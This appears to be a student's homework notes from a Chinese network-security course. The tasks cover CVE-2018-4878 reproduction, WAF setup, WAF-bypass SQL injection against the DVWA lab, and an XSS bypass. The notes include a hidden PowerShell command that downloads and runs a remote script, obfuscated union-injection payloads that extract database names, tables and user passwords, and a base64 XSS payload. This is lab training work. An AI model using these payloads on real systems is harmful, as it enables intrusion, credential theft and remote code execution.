网络安全C10-2024.11.30@所有人
作业:
- CVE-2018-4878漏洞复现
powershell -windowstyle hidden -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://10.0.0.164:80/magedu.ps1');test.ps1"
- 实现WAF安装与配置
3、WAF绕过SQL注入
(1)分别在无WAF和有WAF的情况下,利用SQLMap进行注入,对比注入结果的区别
无waf情况
有waf情况
- 有WAF的情况下,手工注入出DVWA数据库中的user和password
查看字段 order by 被过滤,且用#显示报错用--+
使用联合注入 1' regexp "%0A%23" /*!union %0a select*/ 1,2 --+
数据库-1' regexp "%0A%23" /*!11144union%20%0A select*/1,DAtaBase(%0A /*!11144*/)--+
用户
-1' regexp "%0A%23" /*!union%20%0A select*/ 1,user(%0A /*!11144*/)--+
,版本,
id=1' regexp "%0A%23" /*!union %0A select*/ 1,/*!11445version*/(%0A /*!11445*/) --+
获取全部表名
id=-1' /*!11445union*/ /*!--+/*%0aselect/*!1,*/ group_concat(/*!11445table_name*/) /*!from*/
/*!--+/*%0ainformation_schema./*!tables*/ /*!where*/ /*!11445table_schema*/='dvwa' --+
获取字段名
id=-1' /*!11445union*/ /*!--+/*%0aselect/*!1,*/ group_concat(/*!11445column_name*/) /*!from*/
/*!--+/*%0ainformation_schema./*!columns*/ /*!where*/ /*!11445table_name*/='users' and /*!11445database*/(%0a /*!11445*/)='dvwa' --+
读数据
?id=-1' /*!11445union*/ /*!--+/*%0aselect/*!user,*/password from users --+
4、WAF绕过XSS实验
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnbmkgaGFvIHNodWFpJyk8L3NjcmlwdD4="
预习:了解提权的概念
预习资料:https://blog.csdn.net/qq_38684504/article/details/91359951
标签:23,WAF,0A,11.30,0A%,--+,regexp From: https://www.cnblogs.com/maoming/p/18601189